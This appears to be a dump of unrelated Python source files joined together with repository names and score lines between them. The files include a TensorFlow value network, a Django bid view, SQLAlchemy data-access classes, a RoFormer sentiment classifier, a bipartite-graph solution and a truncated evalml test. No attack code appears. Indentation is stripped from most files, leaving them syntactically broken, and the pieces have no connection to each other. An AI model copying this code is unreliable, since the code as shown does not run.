hid1_mult: size of first hidden layer, multiplier of obs_dim
"""
self.replay_buffer_x = None
self.replay_buffer_y = None
self.obs_dim = obs_dim
self.hid1_mult = hid1_mult
self.epochs = 10
self.lr = None # learning rate set in _build_graph()
self._thread_idx=thread_idx # -1 for global
self._scope_name = "nn_net_"+str(self._thread_idx)
self._build_graph()
#self.sess = tf.Session(graph=self.g)
#self.sess.run(self.init)
var_refs = [v._ref() for v in self.get_vars()]
self.gradients = tf.gradients(
self.loss, var_refs,
gate_gradients=False,
aggregation_method=None,
colocate_gradients_with_ops=False)
self.apply_gradients=None
self.sync = self.sync_from(shared_nn)
#self. global_fit = self.fit_for_global(x=None, y=None, logger=None)
def _build_graph(self):
""" Construct TensorFlow graph, including loss function, init op and train op """
with tf.variable_scope(self._scope_name) as scope:
self.obs_ph = tf.placeholder(tf.float32, (None, self.obs_dim), 'obs_valfunc')
self.val_ph = tf.placeholder(tf.float32, (None,), 'val_valfunc')
# hid1 layer size is 10x obs_dim, hid3 size is 10, and hid2 is geometric mean
hid1_size = self.obs_dim * self.hid1_mult # default multipler 10 chosen empirically on 'Hopper-v1'
hid3_size = 5 # 5 chosen empirically on 'Hopper-v1'
hid2_size = int(np.sqrt(hid1_size * hid3_size))
# heuristic to set learning rate based on NN size (tuned on 'Hopper-v1')
self.lr = 1e-2 / np.sqrt(hid2_size) # 1e-3 empirically determined
print('Value Params -- h1: {}, h2: {}, h3: {}, lr: {:.3g}'
.format(hid1_size, hid2_size, hid3_size, self.lr))
# 3 hidden layers with tanh activations
out = tf.layers.dense(self.obs_ph, hid1_size, tf.tanh,
kernel_initializer=tf.random_normal_initializer(
stddev=np.sqrt(1 / self.obs_dim)), name="h1")
out = tf.layers.dense(out, hid2_size, tf.tanh,
kernel_initializer=tf.random_normal_initializer(
stddev=np.sqrt(1 / hid1_size)), name="h2")
out = tf.layers.dense(out, hid3_size, tf.tanh,
kernel_initializer=tf.random_normal_initializer(
stddev=np.sqrt(1 / hid2_size)), name="h3")
out = tf.layers.dense(out, 1,
kernel_initializer=tf.random_normal_initializer(
stddev=np.sqrt(1 / hid3_size)), name='output')
self.out = tf.squeeze(out)
self.loss = tf.reduce_mean(tf.square(self.out - self.val_ph)) # squared loss
optimizer = tf.train.AdamOptimizer(self.lr)
self.train_op = optimizer.minimize(self.loss)
#self.init = tf.global_variables_initializer()
self.h1_w, self.h1_b = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self._scope_name+'/h1')
self.h2_w, self.h2_b = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self._scope_name+'/h2')
self.h3_w, self.h3_b = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self._scope_name+'/h3')
self.output_w, self.output_b =tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self._scope_name+'/output')
scope.reuse_variables()
#self.sess = tf.Session(graph=self.g)
#self.sess.run(self.init)
    def fit_for_global(self, sess, x, y, logger):
        """ Fit model to current data batch + previous data batch
        Args:
            sess: TensorFlow session
            x: features
y: target
logger: logger to save training loss and % explained variance
"""
num_batches = max(x.shape[0] // 256, 1)
batch_size = x.shape[0] // num_batches
y_hat = self.predict(sess, x) # check explained variance prior to update
old_exp_var = 1 - np.var(y - y_hat)/np.var(y)
if self.replay_buffer_x is None:
x_train, y_train = x, y
else:
x_train = np.concatenate([x, self.replay_buffer_x])
y_train = np.concatenate([y, self.replay_buffer_y])
self.replay_buffer_x = x
self.replay_buffer_y = y
for e in range(self.epochs):
x_train, y_train = shuffle(x_train, y_train)
for j in range(num_batches):
start = j * batch_size
end = (j + 1) * batch_size
feed_dict = {self.obs_ph: x_train[start:end, :],
self.val_ph: y_train[start:end]}
_, l = sess.run([self.train_op, self.loss], feed_dict=feed_dict)
y_hat = self.predict(sess, x)
loss = np.mean(np.square(y_hat - y)) # explained variance after update
exp_var = 1 - np.var(y - y_hat) / np.var(y) # diagnose over-fitting of val func
logger.log({'ValFuncLoss': loss,
'ExplainedVarNew': exp_var,
'ExplainedVarOld': old_exp_var})
def fit(self, sess, x, y, logger):
""" Fit model to current data batch + previous data batch
Args:
x: features
y: target
logger: logger to save training loss and % explained variance
"""
num_batches = max(x.shape[0] // 256, 1)
batch_size = x.shape[0] // num_batches
y_hat = self.predict(sess, x) # check explained variance prior to update
old_exp_var = 1 - np.var(y - y_hat)/np.var(y)
if self.replay_buffer_x is None:
x_train, y_train = x, y
else:
x_train = np.concatenate([x, self.replay_buffer_x])
y_train = np.concatenate([y, self.replay_buffer_y])
self.replay_buffer_x = x
self.replay_buffer_y = y
for e in range(self.epochs):
x_train, y_train = shuffle(x_train, y_train)
for j in range(num_batches):
start = j * batch_size
end = (j + 1) * batch_size
feed_dict = {self.obs_ph: x_train[start:end, :],
self.val_ph: y_train[start:end]}
_, l = sess.run([self.train_op, self.loss], feed_dict=feed_dict)
y_hat = self.predict(sess, x)
loss = np.mean(np.square(y_hat - y)) # explained variance after update
exp_var = 1 - np.var(y - y_hat) / np.var(y) # diagnose over-fitting of val func
logger.log({'ValFuncLoss': loss,
'ExplainedVarNew': exp_var,
'ExplainedVarOld': old_exp_var})
def predict(self, sess, x):
""" Predict method """
feed_dict = {self.obs_ph: x}
y_hat = sess.run(self.out, feed_dict=feed_dict)
return np.squeeze(y_hat)
#def close_sess(self):
# """ Close TensorFlow session """
# sess.close()
def get_vars(self):
return [self.h1_w, self.h1_b,
self.h2_w, self.h2_b,
self.h3_w, self.h3_b,
self.output_w, self.output_b ]
# weights = []
#name = []
#for tensor in self.g.as_graph_def().node:
# name.append(tensor.name)
#print(name)
#with self.g.as_default() as g:
# with tf.variable_scope(self._scope_name) as scope:
# weights.extend(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope))
# weights.append(g.get_tensor_by_name('h1/kernel:0'))
# weights.append(g.get_tensor_by_name('h1/bias:0'))
# weights.append(g.get_tensor_by_name('h2/kernel:0'))
# weights.append(g.get_tensor_by_name('h2/bias:0'))
# weights.append(g.get_tensor_by_name('h3/kernel:0'))
# weights.append(g.get_tensor_by_name('h3/bias:0'))
# return weights
def sync_from(self, shared_nn, name=None):
if shared_nn != None:
src_vars = shared_nn.get_vars()
dst_vars = self.get_vars()
sync_ops = []
with tf.name_scope(name, self._scope_name, []) as name:
for(src_var, dst_var) in zip(src_vars, dst_vars):
sync_op = tf.assign(dst_var, src_var)
sync_ops.append(sync_op)
return tf.group(*sync_ops, name=name)
else:
return None
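# Wiring sketch (illustrative, TensorFlow 1.x style to match the code above): a shared
# "global" network uses thread_idx=-1 and each worker thread builds its own copy that
# can pull the shared weights through its sync op. The obs_dim and hid1_mult values
# here are arbitrary placeholders, not values from the original project.
if __name__ == "__main__":
    shared_nn = NNValueFunction(obs_dim=8, hid1_mult=10, thread_idx=-1, shared_nn=None)
    local_nn = NNValueFunction(obs_dim=8, hid1_mult=10, thread_idx=0, shared_nn=shared_nn)
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        sess.run(local_nn.sync)  # copy the shared weights into the thread-local copy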
| 2.21875 | 2 |
mdepub/actions/__init__.py | bkidwell/mdepub | 35 | 7833 | <reponame>bkidwell/mdepub
"""mdepub actions -- these modules do the actual work."""
import archive
import clean
import create
import epub
import extract
import html
import newid
import version
| 0.84375 | 1 |
gbe/views/make_bid_view.py | bethlakshmi/gbe-divio-djangocms-python2.7 | 1 | 7834 | from django.views.generic import View
from django.utils.decorators import method_decorator
from django.contrib.auth.decorators import login_required
from django.views.decorators.cache import never_cache
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.shortcuts import (
get_object_or_404,
render,
)
from gbe.models import (
Conference,
UserMessage,
)
from gbe_logging import log_func
from gbe.functions import (
validate_profile,
)
from gbe.email.functions import notify_reviewers_on_bid_change
from gbetext import (
no_login_msg,
fee_instructions,
full_login_msg,
payment_needed_msg,
payment_details_error,
)
from gbe_utils.text import no_profile_msg
from gbe.ticketing_idd_interface import (
get_payment_details,
get_ticket_form,
fee_paid,
)
class MakeBidView(View):
form = None
has_draft = True
instructions = ''
payment_form = None
coordinated = False
def groundwork(self, request, args, kwargs):
self.owner = validate_profile(request, require=False)
if not self.owner or not self.owner.complete:
user_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="PROFILE_INCOMPLETE",
defaults={
'summary': "Profile Incomplete",
'description': no_profile_msg})
messages.warning(request, user_message[0].description)
return '%s?next=%s' % (
reverse('profile_update', urlconf='gbe.urls'),
reverse('%s_create' % self.bid_type.lower(),
urlconf='gbe.urls'))
self.bid_object = None
if "bid_id" in kwargs:
bid_id = kwargs.get("bid_id")
self.bid_object = get_object_or_404(self.bid_class, pk=bid_id)
self.conference = self.bid_object.b_conference
else:
self.conference = Conference.objects.filter(
accepting_bids=True).first()
def make_post_forms(self, request, the_form):
if self.bid_object:
self.form = the_form(
request.POST,
instance=self.bid_object,
initial=self.get_initial(),
prefix=self.prefix)
else:
self.form = the_form(
request.POST,
initial=self.get_initial(),
prefix=self.prefix)
self.set_up_form()
def set_up_post(self, request):
the_form = None
if 'submit' in list(request.POST.keys()) or not self.has_draft:
the_form = self.submit_form
user_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="SUBMIT_SUCCESS",
defaults={
'summary': "%s Submit Success" % self.bid_type,
'description': self.submit_msg})
else:
the_form = self.draft_form
user_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="DRAFT_SUCCESS",
defaults={
'summary': "%s Save Draft Success" % self.bid_type,
'description': self.draft_msg})
self.make_post_forms(request, the_form)
return user_message
def make_context(self, request):
paid = fee_paid(
self.bid_type,
self.owner.user_object.username,
self.conference)
instructions = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="BID_INSTRUCTIONS",
defaults={
'summary': "%s Bid Instructions" % self.bid_type,
'description': self.instructions})
context = {
'conference': self.conference,
'forms': [self.form],
'page_title': self.page_title,
'view_title': self.view_title,
'draft_fields': self.draft_fields,
'submit_fields': self.submit_fields,
'fee_paid': paid,
'view_header_text': instructions[0].description,
}
if not paid and not self.coordinated:
user_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="FEE_MESSAGE",
defaults={
'summary': "%s Pre-submit Message" % self.bid_type,
'description': fee_instructions})
messages.info(
request,
user_message[0].description)
if self.payment_form:
context['forms'] += [self.payment_form]
else:
context['forms'] += [get_ticket_form(self.bid_class.__name__,
self.conference)]
return context
def get_create_form(self, request):
if self.bid_object:
self.form = self.submit_form(
prefix=self.prefix,
instance=self.bid_object,
initial=self.get_initial())
else:
self.form = self.submit_form(
prefix=self.prefix,
initial=self.get_initial())
self.set_up_form()
return render(
request,
'gbe/bid.tmpl',
self.make_context(request)
)
def check_validity(self, request):
return self.form.is_valid()
def set_up_form(self):
pass
def get_invalid_response(self, request):
self.set_up_form()
context = self.make_context(request)
return render(
request,
'gbe/bid.tmpl',
context)
def submit_bid(self, request):
self.bid_object.submitted = True
self.bid_object.save()
notify_reviewers_on_bid_change(
self.owner,
self.bid_object,
self.bid_type,
"Submission",
self.conference,
'%s Reviewers' % self.bid_type,
reverse('%s_review' % self.bid_type.lower(),
urlconf='gbe.urls'))
@never_cache
@log_func
def get(self, request, *args, **kwargs):
if not request.user.is_authenticated:
follow_on = '?next=%s' % reverse(
'%s_create' % self.bid_type.lower(),
urlconf='gbe.urls')
user_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="USER_NOT_LOGGED_IN",
defaults={
'summary': "Need Login - %s Bid",
'description': no_login_msg})
full_msg = full_login_msg % (
user_message[0].description,
reverse('login', urlconf='gbe.urls') + follow_on)
messages.warning(request, full_msg)
return HttpResponseRedirect(
reverse('register', urlconf='gbe.urls') + follow_on)
redirect = self.groundwork(request, args, kwargs)
if redirect:
return HttpResponseRedirect(redirect)
return self.get_create_form(request)
@never_cache
@log_func
@method_decorator(login_required)
def post(self, request, *args, **kwargs):
cart_items = []
paypal_button = None
total = None
redirect = None
redirect = self.groundwork(request, args, kwargs)
if redirect:
return HttpResponseRedirect(redirect)
user_message = self.set_up_post(request)
# check bid validity
if not self.check_validity(request):
return self.get_invalid_response(request)
if not self.coordinated and not fee_paid(
self.bid_type,
self.owner.user_object.username,
self.conference) and "draft" not in list(request.POST.keys()):
self.payment_form = get_ticket_form(self.bid_class.__name__,
self.conference,
request.POST)
if not self.payment_form.is_valid():
error_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="PAYMENT_CHOICE_INVALID",
defaults={
'summary': "User Made Invalid Ticket Choice",
'description': payment_details_error})
messages.error(request, error_message[0].description)
return self.get_invalid_response(request)
# save bid
if not self.bid_object:
self.bid_object = self.form.save(commit=False)
self.set_valid_form(request)
# if this isn't a draft, move forward through process, setting up
# payment review if payment is needed
if "submit" in list(request.POST.keys()):
if self.payment_form:
cart_items, paypal_button, total = get_payment_details(
request,
self.payment_form,
self.bid_type,
self.bid_object.pk,
self.owner.user_object.pk)
dynamic_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="NOT_PAID_INSTRUCTIONS",
defaults={
'summary': "%s Not Paid" % self.bid_type,
'description': payment_needed_msg})
page_title = '%s Payment' % self.bid_type
return render(
request,
'gbe/confirm_pay.tmpl',
{'dynamic_message': dynamic_message[0].description,
'page_title': page_title,
'cart_items': cart_items,
'total': total,
'paypal_button': paypal_button})
else:
redirect = self.submit_bid(request)
messages.success(request, user_message[0].description)
return HttpResponseRedirect(
redirect or reverse('home', urlconf='gbe.urls'))
def dispatch(self, *args, **kwargs):
return super(MakeBidView, self).dispatch(*args, **kwargs)
| 1.90625 | 2 |
epicteller/core/dao/character.py | KawashiroNitori/epicteller | 0 | 7835 | <reponame>KawashiroNitori/epicteller<filename>epicteller/core/dao/character.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
from collections import defaultdict
from typing import List, Optional, Iterable, Dict
import base62
from sqlalchemy import select, and_
from sqlalchemy.dialects.mysql import insert as mysql_insert
from epicteller.core.model.character import Character
from epicteller.core.tables import table
from epicteller.core.util import ObjectDict
from epicteller.core.util.enum import ExternalType
from epicteller.core.util.seq import get_id
def _format_character(result) -> Optional[Character]:
if not result:
return
character = Character(
id=result.id,
url_token=result.url_token,
member_id=result.member_id,
name=result.name,
avatar=result.avatar,
description=result.description,
is_removed=bool(result.is_removed),
raw_data=result.data,
created=result.created,
updated=result.updated,
)
return character
class CharacterDAO:
t = table.character
select_clause = select([
t.c.id,
t.c.url_token,
t.c.name,
t.c.member_id,
t.c.avatar,
t.c.description,
t.c.is_removed,
t.c.data,
t.c.created,
t.c.updated,
])
@classmethod
async def batch_get_character_by_id(cls, character_ids: Iterable[int]) -> Dict[int, Character]:
query = cls.select_clause.where(cls.t.c.id.in_(character_ids))
result = await table.execute(query)
rows = await result.fetchall()
return {row.id: _format_character(row) for row in rows}
@classmethod
async def batch_get_character_by_url_token(cls, url_tokens: Iterable[str]) -> Dict[str, Character]:
query = cls.select_clause.where(cls.t.c.url_token.in_(url_tokens))
result = await table.execute(query)
rows = await result.fetchall()
        return {row.url_token: _format_character(row) for row in rows}
@classmethod
async def get_characters_by_owner(cls, member_id: int) -> List[Character]:
query = cls.select_clause.where(cls.t.c.member_id == member_id)
results = await table.execute(query)
characters = [_format_character(room) for room in await results.fetchall()]
return characters
@classmethod
async def update_character(cls, character_id: int, **kwargs) -> None:
if 'updated' not in kwargs:
kwargs['updated'] = int(time.time())
query = cls.t.update().values(kwargs).where(cls.t.c.id == character_id)
await table.execute(query)
@classmethod
async def create_character(cls, member_id: int, name: str, avatar: str, description: str,
raw_data: dict) -> Character:
created = int(time.time())
url_token = base62.encode(get_id())
values = ObjectDict(
url_token=url_token,
member_id=member_id,
name=name,
avatar=avatar,
description=description,
is_removed=0,
data=raw_data,
created=created,
updated=created,
)
query = cls.t.insert().values(values)
result = await table.execute(query)
values.id = result.lastrowid
character = _format_character(values)
return character
class CharacterCampaignDAO:
t = table.character_campaign_index
@classmethod
async def get_character_id_by_campaign_name(cls, campaign_id: int, name: str) -> Optional[int]:
query = select([cls.t.c.character_id]).where(and_(cls.t.c.campaign_id == campaign_id,
cls.t.c.name == name))
result = await table.execute(query)
row = await result.fetchone()
if not row:
return
return int(row.character_id)
@classmethod
async def get_character_ids_by_campaign_id(cls, campaign_id: int) -> List[int]:
query = select([cls.t.c.character_id]).where(cls.t.c.campaign_id == campaign_id)
results = await table.execute(query)
character_ids = [int(row.character_id) for row in await results.fetchall()]
return character_ids
@classmethod
async def get_campaign_ids_by_character_ids(cls, character_ids: List[int]) -> Dict[int, List[int]]:
query = select([
cls.t.c.character_id,
cls.t.c.campaign_id,
]).where(cls.t.c.character_id.in_(character_ids))
results = await table.execute(query)
rows = await results.fetchall()
campaign_map = defaultdict(list)
for r in rows:
campaign_map[r.character_id].append(r.campaign_id)
return dict(campaign_map)
@classmethod
async def bind_character_to_campaign(cls, character_id: int, name: str, campaign_id: int):
query = mysql_insert(cls.t).values(
character_id=character_id,
name=name,
campaign_id=campaign_id,
).on_duplicate_key_update(
name=name,
)
await table.execute(query)
@classmethod
async def unbind_character_to_campaign(cls, character_id: int, campaign_id: int):
query = cls.t.delete().where(and_(cls.t.c.character_id == character_id, cls.t.c.campaign_id == campaign_id))
await table.execute(query)
class CharacterExternalDAO:
t = table.character_external_id
@classmethod
async def get_external_ids_by_character(cls, character_id: int) -> Dict[ExternalType, str]:
query = select([
cls.t.c.type,
cls.t.c.external_id,
]).where(cls.t.c.character_id == character_id)
result = await table.execute(query)
rows = await result.fetchall()
externals = {ExternalType(row.type): row.external_id for row in rows}
return externals
@classmethod
async def get_character_ids_by_external(cls, external_type: ExternalType, external_id: str) -> List[int]:
query = select([cls.t.c.character_id]).where(and_(cls.t.c.type == int(external_type),
cls.t.c.external_id == external_id))
result = await table.execute(query)
rows = await result.fetchall()
character_ids = [r.character_id for r in rows]
return character_ids
@classmethod
async def bind_character_external_id(cls, character_id: int, external_type: ExternalType, external_id: str):
query = mysql_insert(cls.t).values(
character_id=character_id,
type=int(external_type),
external_id=external_id,
).on_duplicate_key_update(
external_id=external_id,
)
await table.execute(query)
@classmethod
async def unbind_character_external_id(cls, character_id: int, external_type: ExternalType):
query = cls.t.delete().where(and_(cls.t.c.character_id == character_id, cls.t.c.type == int(external_type)))
await table.execute(query)
| 2.140625 | 2 |
examples/sentence_classfication/task_sentiment_classification_roformer_v2.py | Tongjilibo/bert4torch | 49 | 7836 | <gh_stars>10-100
#! -*- coding:utf-8 -*-
# Sentiment classification example with RoPE relative position encoding (RoFormer v2)
# Official project: https://github.com/ZhuiyiTechnology/roformer-v2
# PyTorch reference project: https://github.com/JunnYu/RoFormer_pytorch
from bert4torch.tokenizers import Tokenizer
from bert4torch.models import build_transformer_model, BaseModel
from bert4torch.snippets import sequence_padding, Callback, text_segmentate, ListDataset
import torch.nn as nn
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
maxlen = 128
batch_size = 16
config_path = 'F:/Projects/pretrain_ckpt/roformer/[sushen_torch_base]--roformer_v2_char_base/config.json'
checkpoint_path = 'F:/Projects/pretrain_ckpt/roformer/[sushen_torch_base]--roformer_v2_char_base/pytorch_model.bin'
dict_path = 'F:/Projects/pretrain_ckpt/roformer/[sushen_torch_base]--roformer_v2_char_base/vocab.txt'
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Build the tokenizer
tokenizer = Tokenizer(dict_path, do_lower_case=True)
# Load the dataset
class MyDataset(ListDataset):
@staticmethod
def load_data(filenames):
"""加载数据,并尽量划分为不超过maxlen的句子
"""
D = []
seps, strips = u'\n。!?!?;;,, ', u';;,, '
for filename in filenames:
with open(filename, encoding='utf-8') as f:
for l in f:
text, label = l.strip().split('\t')
for t in text_segmentate(text, maxlen - 2, seps, strips):
D.append((t, int(label)))
return D
def collate_fn(batch):
batch_token_ids, batch_segment_ids, batch_labels = [], [], []
for text, label in batch:
token_ids, segment_ids = tokenizer.encode(text, maxlen=maxlen)
batch_token_ids.append(token_ids)
batch_segment_ids.append(segment_ids)
batch_labels.append([label])
batch_token_ids = torch.tensor(sequence_padding(batch_token_ids), dtype=torch.long, device=device)
batch_segment_ids = torch.tensor(sequence_padding(batch_segment_ids), dtype=torch.long, device=device)
batch_labels = torch.tensor(batch_labels, dtype=torch.long, device=device)
return [batch_token_ids, batch_segment_ids], batch_labels.flatten()
# Load the datasets
train_dataloader = DataLoader(MyDataset(['E:/Github/bert4torch/examples/datasets/sentiment/sentiment.train.data']), batch_size=batch_size, shuffle=True, collate_fn=collate_fn)
valid_dataloader = DataLoader(MyDataset(['E:/Github/bert4torch/examples/datasets/sentiment/sentiment.valid.data']), batch_size=batch_size, collate_fn=collate_fn)
test_dataloader = DataLoader(MyDataset(['E:/Github/bert4torch/examples/datasets/sentiment/sentiment.test.data']), batch_size=batch_size, collate_fn=collate_fn)
# Define the model structure on top of BERT
class Model(BaseModel):
def __init__(self) -> None:
super().__init__()
        # Specify the model and the corresponding checkpoint path
self.bert, self.config = build_transformer_model(config_path=config_path, checkpoint_path=checkpoint_path, model='roformer_v2', return_model_config=True)
self.dropout = nn.Dropout(0.1)
self.dense = nn.Linear(self.config['hidden_size'], 2)
def forward(self, token_ids, segment_ids):
last_hidden_state = self.bert([token_ids, segment_ids])
output = self.dropout(last_hidden_state[:, 0, :])
output = self.dense(output)
return output
model = Model().to(device)
# Define the loss and optimizer; custom choices are supported here
model.compile(
loss=nn.CrossEntropyLoss(),
    optimizer=optim.Adam(model.parameters(), lr=2e-5),  # use a sufficiently small learning rate
metrics=['accuracy']
)
# Define the evaluation function
def evaluate(data):
total, right = 0., 0.
for x_true, y_true in data:
y_pred = model.predict(x_true).argmax(axis=1)
total += len(y_true)
right += (y_true == y_pred).sum().item()
return right / total
class Evaluator(Callback):
"""评估与保存
"""
def __init__(self):
self.best_val_acc = 0.
def on_epoch_end(self, global_step, epoch, logs=None):
val_acc = evaluate(valid_dataloader)
if val_acc > self.best_val_acc:
self.best_val_acc = val_acc
# model.save_weights('best_model.pt')
print(f'val_acc: {val_acc:.5f}, best_val_acc: {self.best_val_acc:.5f}\n')
if __name__ == '__main__':
evaluator = Evaluator()
model.fit(train_dataloader, epochs=20, steps_per_epoch=500, callbacks=[evaluator])
else:
model.load_weights('best_model.pt')
| 2.453125 | 2 |
pyscf/nao/test/test_0037_aos.py | fdmalone/pyscf | 1 | 7837 | # Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division
import os,unittest,numpy as np
class KnowValues(unittest.TestCase):
def test_aos_libnao(self):
""" Computing of the atomic orbitals """
from pyscf.nao import system_vars_c
from pyscf.tools.cubegen import Cube
sv = system_vars_c().init_siesta_xml(label='water', cd=os.path.dirname(os.path.abspath(__file__)))
cc = Cube(sv, nx=20, ny=20, nz=20)
aos = sv.comp_aos_den(cc.get_coords())
self.assertEqual(aos.shape[0], cc.nx*cc.ny*cc.nz)
self.assertEqual(aos.shape[1], sv.norbs)
if __name__ == "__main__": unittest.main()
| 1.984375 | 2 |
code_week12_713_719/is_graph_bipartite_hard.py | dylanlee101/leetcode | 0 | 7838 | '''
Given an undirected graph `graph`, return true when the graph is bipartite.

A graph is bipartite if its node set can be split into two independent subsets A and B such that
every edge in the graph connects one node from A with one node from B.

The graph is given as an adjacency list: graph[i] is a list of all nodes connected to node i.
Each node is an integer between 0 and graph.length - 1. The graph has no self-loops and no
parallel edges: graph[i] does not contain i, and graph[i] contains no duplicate values.

Example 1:

Input: [[1,3], [0,2], [1,3], [0,2]]
Output: true
Explanation:
The undirected graph is:
0----1
|    |
|    |
3----2
The nodes can be split into two groups: {0, 2} and {1, 3}.

Example 2:

Input: [[1,2,3], [0,2], [0,1,3], [0,2]]
Output: false
Explanation:
The undirected graph is:
0----1
| \  |
|  \ |
3----2
The nodes cannot be split into two independent subsets.

Source: LeetCode
Link: https://leetcode-cn.com/problems/is-graph-bipartite
'''
from typing import List


class Solution:
def isBipartite(self, graph: List[List[int]]) -> bool:
n = len(graph)
uncolored, red, green = 0, 1, 2
color = [uncolored] * n
valid = True
def dfs(node, c):
nonlocal valid
color[node] = c
cNei = (green if c == red else red)
for neighbor in graph[node]:
if color[neighbor] == uncolored:
dfs(neighbor, cNei)
if not valid:
return
elif color[neighbor] != cNei:
valid = False
return
for i in range(n):
if color[i] == uncolored:
dfs(i, red)
if not valid:
break
return valid
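# Minimal self-check using the two examples from the problem statement above.
if __name__ == '__main__':
    solver = Solution()
    print(solver.isBipartite([[1, 3], [0, 2], [1, 3], [0, 2]]))        # expected: True
    print(solver.isBipartite([[1, 2, 3], [0, 2], [0, 1, 3], [0, 2]]))  # expected: False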
| 3.90625 | 4 |
data_preprocessing/decision_tree_regression.py | Frost199/Machine_Learning | 0 | 7839 | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 17 06:44:47 2018
@author: <NAME>
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.tree import DecisionTreeRegressor
# importing the dataset
dataset = pd.read_csv('Position_Salaries.csv')
# take all the columns but leave the last one(-1)
# always make sure our independent variable is a matrix not a vector and
# dependent variable can be a vector
X = dataset.iloc[:, 1:-1].values
Y = dataset.iloc[:, 2].values
# splitting the dataset into a training set and a test set
# x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0)
# feature scaling
"""sc_X = StandardScaler()
x_train = sc_X.fit_transform(x_train)
x_test = sc_X.transform(x_test)
sc_Y = StandardScaler()
x_train = sc_X.fit_transform(x_train)"""
# fitting the Decision Tree regression Model to the dataset
regressor = DecisionTreeRegressor(random_state=0)
regressor.fit(X, Y)
# predicting a new result
y_pred = regressor.predict([[6.5]])  # scikit-learn expects a 2D array of samples
# Visualizing the Decision tree regression result (for higher resolution and smoother curve)
X_grid = np.arange(min(X), max(X), 0.01)
X_grid = X_grid.reshape(len(X_grid), 1)
plt.scatter(X, Y, color='red')
plt.plot(X_grid, regressor.predict(X_grid), color='blue')
plt.title("Truth or Bluff (Regression Model)")
plt.xlabel("Position Level")
plt.ylabel("Salary")
plt.show()
| 3.265625 | 3 |
user_messages/apps.py | everaccountable/django-user-messages | 0 | 7840 | <filename>user_messages/apps.py
from django.apps import AppConfig
from django.conf import settings
from django.core import checks
from django.template import engines
from django.template.backends.django import DjangoTemplates
from django.utils.text import capfirst
from django.utils.translation import gettext_lazy as _
@checks.register()
def check_context_processors(app_configs, **kwargs):
errors = []
for engine in engines.all():
if isinstance(engine, DjangoTemplates):
django_templates_instance = engine.engine
break
else:
django_templates_instance = None
if django_templates_instance:
if (
"django.contrib.messages.context_processors.messages"
not in django_templates_instance.context_processors
and "admin.E404" not in settings.SILENCED_SYSTEM_CHECKS
):
errors.append(
checks.Error(
"If using 'user_messages.context_processors.messages'"
" instead of the official messages context processor"
" you have to add 'admin.E404' to SILENCED_SYSTEM_CHECKS.",
id="user_messages.E001",
)
)
if ("admin.E406" not in settings.SILENCED_SYSTEM_CHECKS and
"django.contrib.messages" not in settings.INSTALLED_APPS):
errors.append(
checks.Error(
"If using 'user_messages' instead of django.contrib.messages"
" you have to add 'admin.E406' to SILENCED_SYSTEM_CHECKS.",
id="user_messages.E002",
)
)
return errors
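# Illustrative project-level configuration (assumption: these settings live in the project's
# settings.py, shown here only as a hint matching the two checks above):
#
#     SILENCED_SYSTEM_CHECKS = ["admin.E404", "admin.E406"]
#     INSTALLED_APPS = [..., "user_messages"]   # replacing "django.contrib.messages"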
class UserMessagesConfig(AppConfig):
default_auto_field = "django.db.models.AutoField"
name = "user_messages"
verbose_name = capfirst(_("user messages"))
| 1.976563 | 2 |
evalml/tests/objective_tests/test_standard_metrics.py | sharshofski/evalml | 0 | 7841 | from itertools import product
import numpy as np
import pandas as pd
import pytest
from sklearn.metrics import matthews_corrcoef as sk_matthews_corrcoef
from evalml.objectives import (
F1,
MAPE,
MSE,
AccuracyBinary,
AccuracyMulticlass,
BalancedAccuracyBinary,
BalancedAccuracyMulticlass,
BinaryClassificationObjective,
CostBenefitMatrix,
ExpVariance,
F1Macro,
F1Micro,
F1Weighted,
LogLossBinary,
MCCBinary,
MCCMulticlass,
MeanSquaredLogError,
Precision,
PrecisionMacro,
PrecisionMicro,
PrecisionWeighted,
Recall,
RecallMacro,
RecallMicro,
RecallWeighted,
RootMeanSquaredError,
RootMeanSquaredLogError
)
from evalml.objectives.utils import (
_all_objectives_dict,
get_non_core_objectives
)
EPS = 1e-5
all_automl_objectives = _all_objectives_dict()
all_automl_objectives = {name: class_() for name, class_ in all_automl_objectives.items() if class_ not in get_non_core_objectives()}
def test_input_contains_nan():
y_predicted = np.array([np.nan, 0, 0])
y_true = np.array([1, 2, 1])
for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"):
objective.score(y_true, y_predicted)
y_true = np.array([np.nan, 0, 0])
y_predicted = np.array([1, 2, 0])
for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="y_true contains NaN or infinity"):
objective.score(y_true, y_predicted)
y_true = np.array([1, 0])
y_predicted_proba = np.array([[1, np.nan], [0.1, 0]])
for objective in all_automl_objectives.values():
if objective.score_needs_proba:
with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"):
objective.score(y_true, y_predicted_proba)
def test_input_contains_inf():
y_predicted = np.array([np.inf, 0, 0])
y_true = np.array([1, 0, 0])
